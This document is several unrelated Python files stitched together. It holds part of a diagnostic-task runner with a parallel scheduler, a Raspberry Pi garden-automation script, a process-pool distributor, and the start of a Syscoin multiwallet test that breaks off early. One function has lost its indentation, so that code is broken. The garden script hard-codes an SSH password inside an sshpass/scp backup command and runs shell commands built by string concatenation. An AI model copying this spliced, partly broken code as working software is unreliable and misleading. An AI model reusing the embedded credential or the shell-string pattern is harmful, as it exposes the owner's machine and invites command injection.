        # Run ancestors first and feed their outputs into this task.
        for ancestor in self.ancestors:
            input_files.extend(ancestor.run())
        self.output_files = self._run(input_files)
        return self.output_files

    def _run(self, input_files):
        raise NotImplementedError(
            "Method should be implemented by child class")

    def str(self):
        """Return a nicely formatted description."""

        def _indent(txt):
            return '\n'.join('\t' + line for line in txt.split('\n'))

        if self.ancestors:
            ancestors_txt = '\n\n'.join(
                _indent(str(task)) for task in self.ancestors)
        else:
            ancestors_txt = 'None'
        return 'settings:\n{}\nancestors:\n{}'.format(
            pprint.pformat(self.settings, indent=2), ancestors_txt)
class DiagnosticError(Exception):
    """Raised when a diagnostic script cannot be resolved or fails at runtime."""
class DiagnosticTask(AbstractTask):
    """Task for running a diagnostic script (Python, NCL or R)."""

    def __init__(self, script, settings, output_dir, ancestors=None):
        """Initialize the task and resolve the command line used to run it."""
        super(DiagnosticTask, self).__init__(
            settings=settings, output_dir=output_dir, ancestors=ancestors)
        self.script = script
        self.cmd = self._initialize_cmd(script)
        # Script stdout/stderr and resource usage are logged in run_dir.
        self.log = os.path.join(settings['run_dir'], 'log.txt')
        self.resource_log = os.path.join(settings['run_dir'],
                                         'resource_usage.txt')

    def _initialize_cmd(self, script):
        """Build an argv list for executing *script*.

        Raises DiagnosticError if the script file does not exist or has an
        unknown extension while not being directly executable.
        """
        diagnostics_root = os.path.join(
            os.path.dirname(__file__), 'diag_scripts')
        script_file = os.path.abspath(os.path.join(diagnostics_root, script))
        if not os.path.isfile(script_file):
            raise DiagnosticError(
                "Cannot execute script {} ({}): file does not exist.".format(
                    script, script_file))
        cmd = []
        if not os.access(script_file, os.X_OK):  # if not executable
            # Pick an interpreter from the file extension.
            extension = os.path.splitext(script)[1].lower()[1:]
            if not self.settings['profile_diagnostic']:
                executables = {
                    'py': [which('python')],
                    'ncl': [which('ncl'), '-n', '-p'],
                    'r': [which('Rscript')],
                }
            else:
                # Profiling mode: run Python diagnostics under vmprof.
                profile_file = os.path.join(self.settings['run_dir'],
                                            'profile.bin')
                executables = {
                    'py': [which('python'), '-m', 'vmprof', '--lines',
                           '-o', profile_file],
                    'ncl': [which('ncl'), '-n', '-p'],
                    'r': [which('Rscript')],
                }
            if extension not in executables:
                raise DiagnosticError(
                    "Cannot execute script {} ({}): non-executable file "
                    "with unknown extension.".format(script, script_file))
            cmd = executables[extension]
        cmd.append(script_file)
        return cmd

    def write_settings(self):
        """Write settings to a YAML file; return the settings file path.

        For NCL scripts an additional NCL settings file is written and its
        path is returned instead.
        """
        run_dir = self.settings['run_dir']
        if not os.path.exists(run_dir):
            os.makedirs(run_dir)
        filename = os.path.join(run_dir, 'settings.yml')
        with open(filename, 'w') as file:
            yaml.safe_dump(self.settings, file)
        # If running an NCL script:
        if self.script.lower().endswith('.ncl'):
            # Also write an NCL file and return the name of that instead.
            return self._write_ncl_settings()
        return filename

    def _write_ncl_settings(self):
        """Write settings to an NCL file; return its path.

        Settings are split into `config_user_info` (well-known user config
        keys), `diag_script_info` (other non-dict values) and top-level
        entries for dict values.
        """
        filename = os.path.join(self.settings['run_dir'], 'settings.ncl')
        config_user_keys = {
            'run_dir',
            'plot_dir',
            'work_dir',
            'table_dir',
            'max_data_filesize',
            'output_file_type',
            'table_output_file_type',
            'log_level',
            'write_plots',
            'write_netcdf',
            'write_table',
        }
        settings = {'diag_script_info': {}, 'config_user_info': {}}
        for key, value in self.settings.items():
            if key in config_user_keys:
                settings['config_user_info'][key] = value
            elif not isinstance(value, dict):
                settings['diag_script_info'][key] = value
            else:
                settings[key] = value
        write_ncl_settings(settings, filename)
        return filename

    def _control_ncl_execution(self, process, lines):
        """Check if an error has occurred in an NCL script.

        Apparently NCL does not automatically exit with a non-zero exit code
        if an error occurs, so we take care of that here: scan *lines* of
        output, kill *process* and raise DiagnosticError on the first error.
        """
        ignore_warnings = [
            warning.strip()
            for warning in self.settings.get('ignore_ncl_warnings', [])
        ]
        errors = ['error:', 'fatal:']
        if self.settings['exit_on_ncl_warning']:
            errors.append('warning:')
        msg = ("An error occurred during execution of NCL script {}, "
               "see the log in {}".format(self.script, self.log))
        warned = False
        for line in lines:
            if line.strip() in ignore_warnings:
                continue
            if 'warning:' in line:
                logger.warning("NCL: %s", line)
                warned = True
            for error in errors:
                if error in line:
                    logger.error(msg)
                    logger.error("NCL: %s", line)
                    try:
                        process.kill()
                    except OSError:  # ignore error if process already exited
                        pass
                    else:
                        logger.error("Killed process.")
                    raise DiagnosticError(msg)
        if warned:
            logger.warning(
                "There were warnings during the execution of NCL script %s, "
                "for details, see the log %s", self.script, self.log)

    def _start_diagnostic_script(self, cmd, env, cwd):
        """Start the diagnostic script as a subprocess; return the Popen object.

        Also logs a one-line shell command that can be used to re-run the
        script manually.
        """
        logger.info("Running command %s", cmd)
        logger.debug("in environment\n%s", pprint.pformat(env))
        logger.debug("in current working directory: %s", cwd)
        logger.info("Writing output to %s", self.output_dir)
        logger.info("Writing plots to %s", self.settings['plot_dir'])
        logger.info("Writing log to %s", self.log)
        rerun_msg = '' if cwd is None else 'cd {}; '.format(cwd)
        if env:
            # Only include variables that differ from the parent environment.
            rerun_msg += ' '.join('{}="{}"'.format(k, env[k]) for k in env
                                  if k not in os.environ)
        rerun_msg += ' ' + ' '.join(cmd)
        logger.info("To re-run this diagnostic script, run:\n%s", rerun_msg)
        try:
            process = subprocess.Popen(
                cmd,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                cwd=cwd,
                env=env)
        except OSError as exc:
            # ENOEXEC: the file has the executable bit but is not a valid
            # executable (e.g. missing shebang); clearing the bit makes it
            # run through the interpreter selected in _initialize_cmd.
            if exc.errno == errno.ENOEXEC:
                logger.error(
                    "Diagnostic script has its executable bit set, but is "
                    "not executable. To fix this run:\nchmod -x %s", cmd[0])
                logger.error(
                    "You may also need to fix this in the git repository.")
            raise
        return process

    def _run(self, input_files):
        """Run the diagnostic script; return [output_dir] on success."""
        if self.script is None:  # Run only preprocessor
            output_files = []
            return output_files
        is_ncl_script = self.script.lower().endswith('.ncl')
        # Forward only the settings files matching the script language.
        if is_ncl_script:
            input_files = [
                f for f in input_files
                if f.endswith('.ncl') or os.path.isdir(f)
            ]
        else:
            input_files = [
                f for f in input_files
                if f.endswith('.yml') or os.path.isdir(f)
            ]
        self.settings['input_files'] = input_files
        cmd = list(self.cmd)
        cwd = None
        env = dict(os.environ)
        settings_file = self.write_settings()
        if self.script.lower().endswith('.py'):
            # Set non-interactive matplotlib backend
            env['MPLBACKEND'] = 'Agg'
        else:
            # Make diag_scripts path available to diagostics scripts
            env['diag_scripts'] = os.path.join(
                os.path.dirname(__file__), 'diag_scripts')
        if is_ncl_script:
            cwd = os.path.dirname(__file__)
            # NCL finds its settings through this environment variable.
            env['settings'] = settings_file
        else:
            cmd.append(settings_file)
        process = self._start_diagnostic_script(cmd, env, cwd)
        returncode = None
        last_line = ['']
        with resource_usage_logger(process.pid, self.resource_log),\
                open(self.log, 'at') as log:
            while returncode is None:
                returncode = process.poll()
                txt = process.stdout.read()
                txt = txt.decode(encoding='utf-8', errors='ignore')
                log.write(txt)
                # Check if an error occurred in an NCL script
                # Last line is treated separately to avoid missing
                # error messages spread out over multiple lines.
                lines = txt.split('\n')
                if is_ncl_script:
                    self._control_ncl_execution(process, last_line + lines)
                last_line = lines[-1:]
                # wait, but not long because the stdout buffer may fill up:
                # https://docs.python.org/3.6/library/subprocess.html#subprocess.Popen.stdout
                time.sleep(0.001)
        if returncode == 0:
            return [self.output_dir]
        raise DiagnosticError(
            "Diagnostic script {} failed with return code {}. See the log "
            "in {}".format(self.script, returncode, self.log))

    def __str__(self):
        """Get human readable description."""
        txt = "{}:\nscript: {}\n{}".format(
            self.__class__.__name__,
            self.script,
            super(DiagnosticTask, self).str(),
        )
        return txt
def get_flattened_tasks(tasks):
    """Return a set of all tasks and their ancestors in `tasks`."""
    flattened = set()
    for task in tasks:
        flattened.update(task.flatten())
    return flattened
def get_independent_tasks(tasks):
    """Return the tasks that are not an ancestor of any other task."""
    all_tasks = get_flattened_tasks(tasks)
    # A task is dependent when some other task lists it as an ancestor.
    dependents = set()
    for task in all_tasks:
        dependents.update(task.ancestors)
    return {task for task in all_tasks if task not in dependents}
def run_tasks(tasks, max_parallel_tasks=None):
    """Run *tasks*: sequentially when max_parallel_tasks == 1, else in a pool."""
    if max_parallel_tasks == 1:
        _run_tasks_sequential(tasks)
        return
    _run_tasks_parallel(tasks, max_parallel_tasks)
def _run_tasks_sequential(tasks):
    """Run all tasks one after another in the current process."""
    task_count = len(get_flattened_tasks(tasks))
    logger.info("Running %s tasks sequentially", task_count)
    # Running the independent (top-level) tasks recursively runs ancestors.
    for independent_task in get_independent_tasks(tasks):
        independent_task.run()
def _run_tasks_parallel(tasks, max_parallel_tasks=None):
    """Run tasks in parallel using a multiprocessing pool.

    Tasks are submitted as soon as all of their ancestors have completed;
    results are copied back onto the task objects in the parent process.

    Args:
        tasks: iterable of task objects (each with .ancestors and .run()).
        max_parallel_tasks: pool size; None means multiprocessing's default
            (one process per CPU).
    """
    scheduled = get_flattened_tasks(tasks)
    running = []
    results = []
    n_scheduled, n_running = len(scheduled), len(running)
    n_tasks = n_scheduled
    pool = Pool(processes=max_parallel_tasks)
    logger.info("Running %s tasks using at most %s processes", n_tasks,
                max_parallel_tasks or cpu_count())

    def done(task):
        """Assume a task is done if it not scheduled or running."""
        return not (task in scheduled or task in running)

    while scheduled or running:
        # Submit new tasks to pool
        just_scheduled = []
        for task in scheduled:
            if not task.ancestors or all(done(t) for t in task.ancestors):
                result = pool.apply_async(_run_task, [task])
                results.append(result)
                running.append(task)
                just_scheduled.append(task)
        for task in just_scheduled:
            scheduled.remove(task)
        # Handle completed tasks.
        # BUGFIX: the previous implementation removed items from `running`
        # and `results` while iterating over zip(running, results), which
        # skips the element following each removal. Collect the finished
        # pairs first, then remove them.
        completed = [(task, result)
                     for task, result in zip(running, results)
                     if result.ready()]
        for task, result in completed:
            task.output_files = result.get()
            running.remove(task)
            results.remove(result)
        # Wait if there are still tasks running
        if running:
            time.sleep(0.1)
        # Log progress message
        if len(scheduled) != n_scheduled or len(running) != n_running:
            n_scheduled, n_running = len(scheduled), len(running)
            n_done = n_tasks - n_scheduled - n_running
            logger.info("Progress: %s tasks running or queued, %s tasks "
                        "waiting for ancestors, %s/%s done", n_running,
                        n_scheduled, n_done, n_tasks)
    pool.close()
    pool.join()
def _run_task(task):
"""Run task and return the result."""
return task.run()
|
smartGarden.py | import threading
from datetime import datetime
from datetime import timedelta
import os
import zipfile
import logging
from GardenModules.luxSensor.luxSensor import LuxSensor
from GardenModules.pump.pump import WaterPump
from GardenModules.soilMoisture.soil import SoilMoisture
from GardenModules.gardenServer.gardenServer import GardenServer
from GardenModules.artificalLight.artificalLight import ArtificialLight
from GardenModules.tempSensor.tempSensor import TempSensor
import GardenModules.prune.prune as prune
import cv2
from flask import Flask, request, render_template
from flask_cors import CORS
from flask_debug import Debug
import sys
import queue
import signal
# Disable logging for api
# Silence werkzeug's per-request access log; only errors are recorded.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)

# Constants (all intervals in seconds)
WAIT_TIME_SECONDS = 600      # generic sensor-loop period (10 min)
EMAIL_TIME_SECONDS = 36000   # e-mail interval (10 h) -- not used in this file
CAMERA_TIME_SECONDS = 300    # take a picture every 5 minutes
WAIT_TIME_PRUNE = 86400      # prune the log files once per day
image_count = 0              # NOTE(review): never updated in this file
SHUTDOWN_FLAG = False        # polled by worker threads; never set True here -- confirm who sets it

# Flask app serving the control panel from fixed on-device paths.
app = Flask(__name__, template_folder='/home/pi/Desktop/smartGarden/smartGarden/ControlPanel',
            static_folder="/home/pi/Desktop/smartGarden/smartGarden/ControlPanel")
CORS(app)
Debug(app)
def create_folder():
    """Return today's date as YYYY-MM-DD and ensure the image folder exists.

    NOTE(review): the bare ``return`` in ``finally`` swallows *every*
    exception from ``os.mkdir`` (not only FileExistsError), e.g. a missing
    parent directory -- presumably intentional best-effort, confirm.
    """
    stamp = str(datetime.now()).replace(" ", "-")
    pieces = stamp.split('-')
    ymd = pieces[0] + "-" + pieces[1] + "-" + pieces[2]
    try:
        os.mkdir("/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd)
    except FileExistsError:
        pass
    finally:
        return ymd
def zipdir(path, ziph):
    """Recursively add every file under *path* to the open ZipFile *ziph*."""
    logging.info("zipping path: " + path)
    for root, _dirs, filenames in os.walk(path):
        logging.info("root: " + root)
        for name in filenames:
            ziph.write(os.path.join(root, name))
def send_folder(ymd):
    """Zip the image folder for day *ymd* (YYYY-MM-DD), copy the archive to
    the backup host via scp, then delete the local archive.

    Fixes over the previous version:
    * the scp command string was built inside a try/except whose handler
      did not stop execution, so a failure there would have caused a
      NameError on ``scp_command`` below; the command is now built
      unconditionally (plain string concatenation cannot fail).
    * ``logging.warn`` (deprecated alias) replaced by ``logging.warning``.
    """
    time1 = datetime.now()
    logging.info("Zipping File... " + str(datetime.now()))
    base_folder = "/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd
    zip_path = base_folder + ".zip"
    current_directory = os.path.dirname(os.path.realpath(__file__))
    os.chdir("/home/pi/Desktop/smartGarden/smartGarden/images")
    zf = zipfile.ZipFile(zip_path, mode='w', compression=zipfile.ZIP_LZMA)
    try:
        zipdir(base_folder, zf)
    finally:
        zf.close()
    logging.info("Sending images...")
    # SECURITY: the remote password is hard-coded and visible in the process
    # list while scp runs; prefer ssh key authentication. Left as-is because
    # fixing it requires host-side changes.
    scp_command = "SSHPASS='al.EX.91.27' sshpass -e scp " + zip_path + " alext@192.168.0.20:D:\\\\smartGarden\\\\Images"
    try:
        os.system(scp_command)
        os.system("rm " + zip_path)
        # os.system("rm -r " + base_folder)
        os.chdir(current_directory)
        time2 = datetime.now()
        diff = time2 - time1
        logging.info("It took (mins, seconds): " + str(divmod(diff.total_seconds(), 60)) + " to transfer " + str(zip_path))
    except Exception as e:
        logging.warning("There was an error deleting the folders and moving back a directory")
        logging.warning(e)
def take_pics(ymd, number=1):
    """Capture *number* webcam frames and save each as a timestamped JPEG
    under images/<ymd>/.

    The timestamp is sanitized (spaces/colons/dots replaced with '-') so it
    is a valid filename.
    """
    for x in range(number):
        logging.info("Taking image " + str(x + 1) + " out of " + str(number))
        filename = str(datetime.now()).replace(" ", "-")
        filename = filename.replace(":", "-")
        filename = filename.replace(".", "-")
        filename = filename + ".jpg"
        # Take image
        # old was 800x600
        vid_cap = cv2.VideoCapture(0)
        vid_cap.set(3, 1280)  # property 3 = frame width
        vid_cap.set(4, 720)   # property 4 = frame height
        if not vid_cap.isOpened():
            logging.warn("Error opening video device using opencv")
        else:
            print("Taking picture")
            # NOTE(review): this inner loop reuses `x`, shadowing the outer
            # loop variable; reading 10 frames and keeping only the last one
            # presumably lets camera exposure settle -- confirm intent.
            for x in range(10):
                ret, image = vid_cap.read()
            cv2.imwrite("/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd + "/" + str(filename), image)
            vid_cap.release()
        # print("Sending picture to: " + "/home/pi/Desktop/smartGarden/smartGarden/images/" + ymd + "/" + str(filename))
        # myCmd = 'fswebcam -q -i 0 -r 1280x720 /home/pi/Desktop/smartGarden/smartGarden/images/' + ymd + "/" + str(filename)
        # os.system(myCmd)
def run_camera(should_send):
    """Take today's pictures; when *should_send* is truthy, first zip and
    upload yesterday's image folder.

    BUGFIX: the parameter was previously named ``send_folder``, shadowing
    the module-level ``send_folder`` function -- with the flag set to True,
    ``send_folder(ymd)`` called the boolean ``True`` and raised TypeError.
    The parameter is renamed so the upload function is reachable again
    (the only live caller passes the flag positionally).
    """
    ymd = create_folder()
    if should_send:
        logging.info("Sending folder")
        # Upload yesterday's folder, named by its YYYY-MM-DD date.
        yesterday = datetime.now() - timedelta(days=1)
        stamp = str(yesterday).replace(" ", "-")
        pieces = stamp.split('-')
        ymd = pieces[0] + "-" + pieces[1] + "-" + pieces[2]
        send_folder(ymd)
        ymd = create_folder()
    take_pics(ymd)
def camera_thread():
    """Worker loop: take a picture every CAMERA_TIME_SECONDS; once per day
    (during the midnight hour) also upload the previous day's folder.

    BUGFIXES:
    * the computed send flag was previously discarded -- ``run_camera(False)``
      was always called, so folders were never uploaded; the flag is now
      passed through.
    * ``hour`` could be unbound when date parsing raised; it is initialized
      before the try block.
    """
    # TODO ADD ANOTHER THREAD FOR SENDING IMAGES TO CACTUAR PC
    create_folder()
    timer = threading.Event()
    sent_folder = False
    while not timer.wait(CAMERA_TIME_SECONDS) and not SHUTDOWN_FLAG:
        should_send = False
        hour = None
        try:
            now_parts = str(datetime.now()).split()
            hour = now_parts[1].split(':')[0]
        except Exception as e:
            print("Error parsing date for camera.")
            print(e)
        if hour == "00" and not sent_folder:
            # First tick of the midnight hour: upload once.
            should_send = True
            sent_folder = True
        elif hour != "00" and sent_folder:
            # Re-arm for the next midnight.
            sent_folder = False
        run_camera(should_send)
        if SHUTDOWN_FLAG:
            break
def prune_logs_thread():
    """Worker loop: once per WAIT_TIME_PRUNE (daily), prune the log files so
    they do not grow without bound.

    BUGFIX: the soil log was pruned via ``prune("soilLog.txt")``, but
    ``prune`` is the imported *module* -- calling it raised
    ``TypeError: 'module' object is not callable``. It now calls
    ``prune.prune`` like the line above it.
    """
    timer = threading.Event()
    while not timer.wait(WAIT_TIME_PRUNE) and not SHUTDOWN_FLAG:
        # TODO FIX PRUNING
        print("Pruning smartGardenLog")
        prune.prune("smartGardenLog.txt")
        prune.prune("soilLog.txt")
        # prune.prune("sunlightLog.txt")
        if SHUTDOWN_FLAG:
            break
if __name__ == "__main__":
    # Ensure the log file exists before configuring logging to it.
    logFile = "/home/pi/Desktop/smartGarden/smartGarden/logs/smartGardenLog.log"
    if not os.path.exists(logFile):
        with open(logFile, 'w+'):
            pass
    logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',
                        filename=logFile, level=logging.INFO, datefmt='%Y-%m-%dT%H:%M:%S')
    # Shared shutdown channel passed to every module thread.
    # NOTE(review): presumably threads check the queued value to decide when
    # to stop -- confirm against the GardenModules implementations.
    sentinel = queue.Queue()
    sentinel.put(False)
    soilMoistureSensor = SoilMoisture(logging, sentinel)
    pump = WaterPump(logging, sentinel, soilMoistureSensor)
    # The lux sensor is optional: start without it if initialization fails.
    luxSensor = None
    try:
        luxSensor = LuxSensor(logging, sentinel)
    except Exception as e:
        logging.error("Failed to start lux sensor")
        logging.error(e)
    tempSensor = TempSensor(logging, sentinel)
    artificialLight = ArtificialLight(logging, sentinel)
    server = GardenServer(sentinel, pump, luxSensor, soilMoistureSensor, tempSensor)
    # Ctrl-C triggers a coordinated shutdown through the server.
    signal.signal(signal.SIGINT, server.shutDownGarden)
    # thread4 = threading.Thread(target=camera_thread)
    thread8 = threading.Thread(target=prune_logs_thread)
    print("Starting threads at time: " + str(datetime.now()) + "...")
    logging.info("Starting threads at time: " + str(datetime.now()) + "...")
    pump.start()
    if luxSensor is not None:
        luxSensor.start()
    tempSensor.start()
    artificialLight.start()
    soilMoistureSensor.start()
    server.start()
    # Daemon thread: killed automatically when the main process exits.
    thread8.daemon = True
    thread8.start()
    print("""
 ____ _ ____ _
/ ___| _ __ ___ __ _ _ __| |_ / ___| __ _ _ __ __| | ___ _ __
\___ \| '_ ` _ \ / _` | '__| __| | | _ / _` | '__/ _` |/ _ \ '_ \
 ___) | | | | | | (_| | | | |_ | |_| | (_| | | | (_| | __/ | | |
|____/|_| |_| |_|\__,_|_| \__| \____|\__,_|_| \__,_|\___|_| |_|
Created by Alexander Taffe
Version 1.0
\n\n\nAll Threads Started!\n\n\n
""")
    logging.info("""
 ____ _ ____ _
/ ___| _ __ ___ __ _ _ __| |_ / ___| __ _ _ __ __| | ___ _ __
\___ \| '_ ` _ \ / _` | '__| __| | | _ / _` | '__/ _` |/ _ \ '_ \
 ___) | | | | | | (_| | | | |_ | |_| | (_| | | | (_| | __/ | | |
|____/|_| |_| |_|\__,_|_| \__| \____|\__,_|_| \__,_|\___|_| |_|
Created by Alexander Taffe
Version 2.0
\n\n\nAll Threads Started!\n\n\n
""")
    # Block until the server thread finishes (i.e. shutdown was requested).
    server.join()
    print("server shutdown")
    logging.info("Shut Down Complete!")
    sys.exit()
    # NOTE(review): everything below is unreachable because of sys.exit()
    # above -- either the exit or these joins should be removed.
    pump.join()
    print("Pump thread ended")
    # thread4.join()
    # print("Thread 4 ended")
    artificialLight.join()
    print("Artificial light ended")
    soilMoistureSensor.join()
    print("Soil moisture thread ended")
    luxSensor.join()
    print("Lux sensor thread ended")
    tempSensor.join()
    print("Temperature sensor thread ended")
    thread8.join()
    print("Thread 8 ended")
|
distributors.py | from __future__ import absolute_import
from __future__ import unicode_literals
import Queue
import logging
import threading
import collections
import multiprocessing
from buckshot import errors
from buckshot import lockutils
from buckshot import constants
from buckshot.workers import TaskWorker
from buckshot.tasks import TaskIterator
LOG = logging.getLogger(__name__)
class ProcessPoolDistributor(object):
    """Distributes an input function across multiple processes.

    NOTE(review): Python 2 code (uses ``Queue``, ``xrange``, ``unicode``).

    Args:
        func: The function to run in each process.
        num_processes: The number of worker processes to spawn.
        timeout: The maximum amount of time to wait for a result from
            a worker process. Default is None (unbounded).
    """

    def __init__(self, func, num_processes=None, timeout=None):
        self._num_processes = num_processes or constants.CPU_COUNT
        self._func = func  # Function to distribute across processes
        self._timeout = timeout  # Timeout for running tasks.
        self._lock = threading.Lock()
        self._processes = None  # Map of pid => Process object.
        self._worker = None  # Worker object.
        self._task_queue = None  # Worker tasks
        self._result_queue = None  # Worker results
        self._tasks_in_progress = None  # Tasks started with unreturned results
        self._task_results_waiting = None  # Task results that are waiting to be returned.

    @property
    def is_started(self):
        """Return True if the workers have been started."""
        return bool(self._processes)

    @property
    def is_completed(self):
        """Return True if all tasks have been picked up and associated results
        have been returned to the caller.
        """
        if not self.is_started:
            return False
        elif self._tasks_in_progress:
            return False
        return True

    def _create_and_register_process(self):
        """Spawn one daemon worker process and record it by pid."""
        process = multiprocessing.Process(target=self._worker)
        process.daemon = True  # This will die if parent process dies.
        process.start()
        LOG.info("Created new subprocess: %d", process.pid)
        self._processes[process.pid] = process

    @lockutils.lock_instance("_lock")
    def start(self):
        """Start the worker processes and return self.

        * Create an input and output queue for worker processes to receive
          tasks and send results.
        * Create a task registry so worker processes can identify what
          task they are working on.

        Note:
            This creates Processes with `daemon=True`, so if the parent process
            dies the child processes will be killed.
        """
        self._processes = {}
        self._result_queue = multiprocessing.Queue()  # TODO: Should this have a maxsize?
        # Bounding the task queue makes put_nowait raise Queue.Full, which
        # _map_to_workers uses as the signal to drain results.
        self._task_queue = multiprocessing.Queue(maxsize=self._num_processes)
        self._tasks_in_progress = collections.OrderedDict()  # Keep track of the order of tasks sent
        self._task_results_waiting = {}  # task id => Result
        self._worker = TaskWorker(
            func=self._func,
            timeout=self._timeout,
            input_queue=self._task_queue,
            output_queue=self._result_queue
        )
        for _ in xrange(self._num_processes):
            self._create_and_register_process()
        return self

    def _send_task(self, task):
        """Queue *task* for a worker; may raise Queue.Full (queue is bounded)."""
        self._task_queue.put_nowait(task)
        self._tasks_in_progress[task.id] = task

    def _flush_result_queue(self):
        """Empty the task result queue and yield all TaskResult objects.

        Note:
            The first queue access blocks. All following attempts to
            retrieve results are non-blocking.

        Yields:
            TaskResult objects.
        """
        yield self._result_queue.get()  # blocks
        while True:
            try:
                result = self._result_queue.get_nowait()  # non-blocking
            except Queue.Empty:
                break
            yield result

    def _recv_results(self):
        """Drain worker results into _task_results_waiting.

        Raises RuntimeError if a worker reported a SubprocessError; task
        timeouts cause the worker process to be replaced.
        """
        for result in self._flush_result_queue():
            if isinstance(result, errors.SubprocessError):
                raise RuntimeError(unicode(result))  # A subprocess died unexpectedly. Shut it down!
            if isinstance(result.value, errors.TaskTimeout):
                self._handle_task_timeout(result)
            LOG.debug("Received result for task: %s", result.task_id)
            self._task_results_waiting[result.task_id] = result

    def _handle_task_timeout(self, task_timeout):
        """Destroy the process that timed out and create a new one in
        its place.

        Note:
            You MUST pass ``join=True`` to _kill_process or else the
            shared Queue may deadlock or become corrupted.
        """
        pid = task_timeout.pid
        # Kill the associated process so the thread stops.
        LOG.info("Subprocess %d timed out. Terminating...", pid)
        self._kill_process(pid, join=True)
        # Make a new process to replace it.
        self._create_and_register_process()

    def _map_to_workers(self, iterable, result_getter):
        """Map the arguments in the input `iterable` to the worker processes.
        Yield any results that worker processes send back.

        Args:
            iterable: An iterable collection of argument tuples.
            result_getter: A function which pulls a result off of the
                worker task queue, and yields any results that are ready
                to be sent back to the caller.
        """
        if not self.is_started:
            raise RuntimeError("Cannot process inputs: must call start() first.")
        tasks = TaskIterator(iterable)
        task = next(tasks)
        while True:
            try:
                self._send_task(task)
                task = next(tasks)
            except Queue.Full:
                # Task queue is saturated: drain results before retrying the
                # same (unsent) task on the next loop iteration.
                LOG.debug("Worker queue full. Waiting for results.")
                for result in result_getter():  # I wish I had `yield from` :(
                    yield result
            except StopIteration:
                break
        # All tasks sent; collect the remaining results.
        while not self.is_completed:
            for result in result_getter():
                yield result

    @lockutils.lock_instance("_lock")
    def imap(self, iterable):
        """Send each argument tuple in `iterable` to a worker process and
        yield results.

        Args:
            iterable: An iterable collection of argument tuples. These tuples
                are in the form expected of the work function. E.g., if the
                work function signature is ``def foo(x, y)`` the `iterable`
                will look like [(1, 2), (3, 4), ...].

        Yields:
            Results from the work function. The results will be returned in
            order of their associated inputs.
        """
        def get_results():
            """Get a result from the worker output queue and try to yield
            results back to the caller.

            This yields results back in the order of their associated tasks.
            """
            self._recv_results()  # blocks
            tasks = self._tasks_in_progress
            results = self._task_results_waiting
            # OrderedDict preserves submission order; stop at the first task
            # whose result has not arrived yet to keep output ordered.
            # NOTE(review): Python 2 semantics -- .keys() returns a list
            # copy, so deleting inside the loop is safe here.
            for task_id in tasks.keys():
                if task_id not in results:
                    break
                del tasks[task_id]
                result = results.pop(task_id)
                yield result.value
        for result in self._map_to_workers(iterable, get_results):
            yield result

    @lockutils.lock_instance("_lock")
    def imap_unordered(self, iterable):
        """Send each argument tuple in `iterable` to a worker process and
        yield results.

        Args:
            iterable: An iterable collection of argument tuples. These tuples
                are in the form expected of the work function. E.g., if the
                work function signature is ``def foo(x, y)`` the `iterable`
                will look like [(1, 2), (3, 4), ...].

        Yields:
            Results from the work function. The results are yielded in the
            order they are received from worker processes.
        """
        def get_results():
            """Get a result from the worker output queue and try to yield
            results back to the caller.

            The order of the results are not guaranteed to align with the
            order of the input tasks.
            """
            self._recv_results()  # blocks
            while self._task_results_waiting:
                task_id, result = self._task_results_waiting.popitem()
                del self._tasks_in_progress[task_id]
                yield result.value
        for result in self._map_to_workers(iterable, get_results):
            yield result

    def _kill_process(self, pid, join=False):
        """Remove and terminate the worker with the given pid.

        NOTE(review): when join=True, join() runs *before* terminate() --
        this presumably relies on the TaskWorker exiting on its own after a
        timeout; otherwise join() would block indefinitely. Confirm against
        TaskWorker's behavior.
        """
        LOG.debug("Killing subprocess %s.", pid)
        process = self._processes.pop(pid)
        if join:
            process.join()
        process.terminate()

    def _reset(self):
        """Unsets all instance variables that are set up in start()."""
        self._worker = None
        self._processes = None
        self._task_queue = None
        self._result_queue = None
        self._tasks_in_progress = None
        self._task_results_waiting = None

    # NOTE(review): decorated with *unlock*_instance, unlike the
    # lock_instance used elsewhere -- presumably releases a lock held by a
    # failed imap/imap_unordered; confirm against buckshot.lockutils.
    @lockutils.unlock_instance("_lock")
    def stop(self):
        """Kill all child processes and clear results."""
        if not self.is_started:
            raise RuntimeError("Cannot call stop() before start()")
        # Python 2: .keys() is a list copy, so mutation inside the loop
        # (via _kill_process popping entries) is safe.
        for pid in self._processes.keys():
            self._kill_process(pid)
        self._reset()
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a syscoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import SyscoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
    """Hammer loadwallet/unloadwallet on *name* until some concurrent loader
    triggers the 'Wallet already loading' RPC error, then stop."""
    global got_loading_error
    while not got_loading_error:
        try:
            node.loadwallet(name)
            node.unloadwallet(name)
        except JSONRPCException as e:
            already_loading = (
                e.error['code'] == -4
                and 'Wallet already loading' in e.error['message'])
            if already_loading:
                got_loading_error = True
                return
class MultiWalletTest(SyscoinTestFramework):
    def set_test_params(self):
        """Use a fresh chain with two nodes; node 0 starts without a wallet."""
        self.setup_clean_chain = True
        self.num_nodes = 2
        # Wallet load/unload under concurrency can be slow; allow a generous
        # RPC timeout.
        self.rpc_timeout = 120
        self.extra_args = [["-nowallet"], []]
    def skip_test_if_missing_module(self):
        """Skip the whole test when the node was built without wallet support."""
        self.skip_if_no_wallet()
    def add_options(self, parser):
        """Add the --data_wallets_dir option pointing at bundled wallet fixtures."""
        parser.add_argument(
            '--data_wallets_dir',
            default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
            help='Test data with wallet directories (default: %(default)s)',
        )
    def run_test(self):
        """Exercise the full multiwallet lifecycle on node0.

        Covers wallet creation/loading from a mix of path styles (plain names,
        subdirectories, absolute paths, symlinks), -walletdir validation,
        concurrent loading, dynamic load/unload/create RPCs, and a
        backup/restore round-trip per wallet.
        """
        node = self.nodes[0]

